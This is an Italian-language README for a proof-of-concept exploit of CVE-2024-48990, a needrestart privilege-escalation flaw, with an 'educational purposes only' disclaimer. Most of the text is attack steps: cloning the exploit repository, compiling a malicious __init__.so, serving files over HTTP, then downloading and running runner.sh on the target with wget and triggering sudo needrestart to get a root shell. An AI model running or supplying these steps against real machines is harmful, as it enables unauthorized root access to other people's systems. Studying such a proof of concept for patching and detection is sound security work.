
PoC relativo a CVE-2024-48990. Qualys ha scoperto che needrestart, prima della versione 3.8, consente agli attaccanti locali di eseguire codice arbitrario come root ingannando needrestart per eseguire l'interprete Python con una variabile d'ambiente PYTHONPATH controllata dall'attaccante. (NIST)
[!WARNING] Questi file e queste informazioni sono destinati esclusivamente a scopo educativo. L'autore non è responsabile di alcun comportamento dannoso. Tutte le informazioni fornite non sono intese a incitare alcun tipo di crimine o abuso.
Qualys ha scoperto che needrestart, prima della versione 3.8, consente a utenti malintenzionati locali di eseguire codice arbitrario come root ingannando needrestart facendogli eseguire l'interprete Python con una variabile d'ambiente PYTHONPATH controllata dall'attaccante. Consulta NIST per i dettagli ufficiali.
git clone https://github.com/grecosamuel/CVE-2024-48990.git
gcc -shared -fPIC -o __init__.so exploit.c
python3 -m http.server
wget http://IP:PORT/runner.sh
chmod +x runner.sh
./runner.sh
sudo needrestart
Quando leggi [*] CVE module created premi CTRL+C per fermare il processo e ottenere la tua shell!